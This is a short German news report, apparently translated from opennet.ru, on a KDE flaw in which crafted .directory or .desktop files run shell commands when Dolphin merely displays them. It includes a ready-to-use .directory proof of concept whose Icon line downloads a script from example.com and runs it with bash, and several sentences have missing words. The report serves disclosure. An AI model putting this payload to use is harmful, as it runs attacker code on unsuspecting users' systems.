In KDE , die es einem Angreifer ermöglicht, beliebige Befehle auszuführen, wenn der Benutzer ein Verzeichnis oder Archiv mit speziell gestalteten " .desktop " und " .directory "-Dateien betrachtet. Es genügt, dass der Benutzer lediglich die Dateiliste im Dateimanager Dolphin ansieht, die schädliche Desktop-Datei herunterlädt oder das Symbol per Drag & Drop auf den Desktop oder in ein Dokument zieht. Das Problem tritt in der aktuellen Version der Bibliotheken auf. und älteren Versionen bis hin zu KDE 4. Die Schwachstelle ist bisher (CVE wurde bisher nicht zugewiesen).
Das Problem wird durch die fehlerhafte Implementierung der Klasse KDesktopFile verursacht, die bei der Verarbeitung der Variablen "Icon" den Wert ohne ausreichende Escaping an die Funktion KConfigPrivate::expandString() weitergibt, die spezielle Shell-Zeichen entschlüsselt, einschließlich der Verarbeitung von Zeilen "$(..)", die als auszuführende Befehle behandelt werden. Entgegen den Anforderungen der XDG-Spezifikation wird die der Shell-Konstrukte ohne Trennung des Einstellungstyps durchgeführt, d. h. nicht nur bei der Definition der Befehlszeile der gestarteten Anwendung, sondern auch bei der Angabe der standardmäßig angezeigten Icons.
Beispielsweise für einen Angriff Eine ZIP-Datei an den Benutzer senden, die ein Verzeichnis mit einer Datei vom Typ „.directory“ enthält:
[Desktop Entry]
Type=Directory
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Beim Versuch, den Inhalt des Archivs im Dateimanager Dolphin anzuzeigen, wird das Skript https://example.com/FILENAME.sh heruntergeladen und ausgeführt.

Quelle: opennet.ru
